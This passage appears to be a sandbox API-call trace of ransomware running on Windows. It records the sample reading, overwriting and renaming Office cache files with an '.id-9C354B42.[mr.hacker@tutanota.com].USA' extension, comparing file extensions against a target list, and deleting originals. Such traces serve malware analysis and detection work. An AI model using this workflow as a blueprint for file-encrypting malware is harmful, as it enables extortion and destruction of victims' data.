lpOverlapped=0x0) returned 1 [0046.652] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.652] WriteFile (in: hFile=0x1ec, lpBuffer=0x40070c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40070c8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.654] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.654] WriteFile (in: hFile=0x1ec, lpBuffer=0x40070c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40070c8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.656] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40070c8 | out: hHeap=0x5d0000) returned 1 [0046.656] CloseHandle (hObject=0x1ec) returned 1 [0046.657] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0046.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.657] lstrlenW (lpString=".doc") returned 4 [0046.657] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.657] lstrlenW (lpString=".docx") returned 5 [0046.657] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.657] lstrlenW (lpString=".pdf") returned 4 [0046.657] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.657] lstrlenW (lpString=".xls") returned 4 [0046.657] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.657] lstrlenW (lpString=".xlsx") returned 5 [0046.657] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.657] lstrlenW (lpString=".ppt") returned 4 [0046.657] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.657] lstrlenW (lpString=".zip") returned 4 [0046.657] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.657] lstrlenW (lpString=".rar") returned 4 [0046.657] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.657] lstrlenW (lpString=".bz2") returned 4 [0046.657] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.657] lstrlenW (lpString=".7z") returned 3 [0046.657] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.657] lstrlenW (lpString=".dbf") returned 4 [0046.657] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.657] lstrlenW (lpString=".1cd") returned 4 [0046.658] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.658] lstrlenW (lpString=".jpg") returned 4 [0046.658] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.658] lstrlenW (lpString=".doc") returned 4 [0046.658] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString=".docx") returned 5 [0046.658] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.658] lstrlenW (lpString=".pdf") returned 4 [0046.658] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString=".xls") returned 4 [0046.658] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString=".xlsx") returned 5 [0046.658] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.658] lstrlenW (lpString=".ppt") returned 4 [0046.658] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.658] lstrlenW (lpString=".zip") returned 4 [0046.658] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString=".rar") returned 4 [0046.658] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString=".bz2") returned 4 [0046.658] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.658] lstrlenW (lpString=".7z") returned 3 [0046.658] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.658] lstrlenW (lpString=".dbf") returned 4 [0046.658] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.658] lstrlenW (lpString=".1cd") returned 4 [0046.658] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.658] lstrlenW (lpString=".jpg") returned 4 [0046.659] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.659] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0046.659] lstrlenW (lpString="GrooveMUI.msi") returned 13 [0046.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0046.659] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=2507776) returned 1 [0046.659] CloseHandle (hObject=0x1ec) returned 1 [0046.659] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 0x2020 [0046.659] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.659] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0046.660] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0046.660] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.660] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.660] ReadFile (in: hFile=0x1ec, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.663] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.663] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.670] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.670] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.670] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.886] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.886] WriteFile (in: hFile=0x1ec, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0046.904] SetEndOfFile (hFile=0x1ec) returned 1 [0046.904] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fc70c0 [0046.908] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.908] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fc70c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc70c0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.046] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.046] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fc70c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc70c0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.052] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.052] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fc70c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc70c0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.055] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fc70c0 | out: hHeap=0x5d0000) returned 1 [0047.079] CloseHandle (hObject=0x1ec) returned 1 [0047.079] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.080] lstrlenW (lpString=".doc") returned 4 [0047.080] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.080] lstrlenW (lpString=".docx") returned 5 [0047.080] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.080] lstrlenW (lpString=".pdf") returned 4 [0047.080] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.080] lstrlenW (lpString=".xls") returned 4 [0047.080] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.080] lstrlenW (lpString=".xlsx") returned 5 [0047.080] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.080] lstrlenW (lpString=".ppt") returned 4 [0047.080] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.080] lstrlenW (lpString=".zip") returned 4 [0047.080] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.080] lstrlenW (lpString=".rar") returned 4 [0047.080] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.080] lstrlenW (lpString=".bz2") returned 4 [0047.080] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.080] lstrlenW (lpString=".7z") returned 3 [0047.080] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.080] lstrlenW (lpString=".dbf") returned 4 [0047.081] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.081] lstrlenW (lpString=".1cd") returned 4 [0047.081] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.081] lstrlenW (lpString=".jpg") returned 4 [0047.081] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.081] lstrlenW (lpString=".doc") returned 4 [0047.081] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.081] lstrlenW (lpString=".docx") returned 5 [0047.081] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.081] lstrlenW (lpString=".pdf") returned 4 [0047.081] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.081] lstrlenW (lpString=".xls") returned 4 [0047.081] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.081] lstrlenW (lpString=".xlsx") returned 5 [0047.081] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.081] lstrlenW (lpString=".ppt") returned 4 [0047.081] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.081] lstrlenW (lpString=".zip") returned 4 [0047.081] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.081] lstrlenW (lpString=".rar") returned 4 [0047.081] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.081] lstrlenW (lpString=".bz2") returned 4 [0047.081] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.081] lstrlenW (lpString=".7z") returned 3 [0047.081] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.081] lstrlenW (lpString=".dbf") returned 4 [0047.081] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.082] lstrlenW (lpString=".1cd") returned 4 [0047.082] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.082] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0047.082] lstrlenW (lpString=".jpg") returned 4 [0047.082] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.082] lstrcmpiW (lpString1=".manifest", lpString2=".USA") returned -1 [0047.082] lstrlenW (lpString="Microsoft.VC90.CRT.manifest") returned 27 [0047.082] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.548] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=1857) returned 1 [0047.548] CloseHandle (hObject=0x1f4) returned 1 [0047.548] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 0x2020 [0047.548] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.548] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.548] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.548] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.548] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.549] GetLastError () returned 0x0 [0047.549] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x741, lpOverlapped=0x0) returned 1 [0047.551] WriteFile (in: hFile=0x178, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x750, lpOverlapped=0x0) returned 1 [0047.554] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.554] WriteFile (in: hFile=0x178, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x10a, lpOverlapped=0x0) returned 1 [0047.554] SetEndOfFile (hFile=0x178) returned 1 [0047.554] CloseHandle (hObject=0x178) returned 1 [0047.554] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.554] SetEndOfFile (hFile=0x1f4) returned 1 [0047.555] CloseHandle (hObject=0x1f4) returned 1 [0047.555] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.555] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1 [0047.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.555] lstrlenW (lpString=".doc") returned 4 [0047.555] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0047.555] lstrlenW (lpString=".docx") returned 5 [0047.555] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0047.555] lstrlenW (lpString=".pdf") returned 4 [0047.555] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0047.555] lstrlenW (lpString=".xls") returned 4 [0047.555] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString=".xlsx") returned 5 [0047.556] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0047.556] lstrlenW (lpString=".ppt") returned 4 [0047.556] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.556] lstrlenW (lpString=".zip") returned 4 [0047.556] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString=".rar") returned 4 [0047.556] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString=".bz2") returned 4 [0047.556] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString=".7z") returned 3 [0047.556] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0047.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.556] lstrlenW (lpString=".dbf") returned 4 [0047.556] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.556] lstrlenW (lpString=".1cd") returned 4 [0047.556] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.556] lstrlenW (lpString=".jpg") returned 4 [0047.556] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.556] lstrlenW (lpString=".doc") returned 4 [0047.556] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString=".docx") returned 5 [0047.556] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0047.556] lstrlenW (lpString=".pdf") returned 4 [0047.556] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString=".xls") returned 4 [0047.556] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString=".xlsx") returned 5 [0047.556] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0047.556] lstrlenW (lpString=".ppt") returned 4 [0047.556] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0047.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.557] lstrlenW (lpString=".zip") returned 4 [0047.557] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0047.557] lstrlenW (lpString=".rar") returned 4 [0047.557] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0047.557] lstrlenW (lpString=".bz2") returned 4 [0047.557] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0047.557] lstrlenW (lpString=".7z") returned 3 [0047.557] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0047.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.557] lstrlenW (lpString=".dbf") returned 4 [0047.557] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0047.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.557] lstrlenW (lpString=".1cd") returned 4 [0047.557] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0047.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0047.557] lstrlenW (lpString=".jpg") returned 4 [0047.557] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0047.557] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0047.557] lstrlenW (lpString="OfficeMUISet.msi") returned 16 [0047.557] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0x80000000, 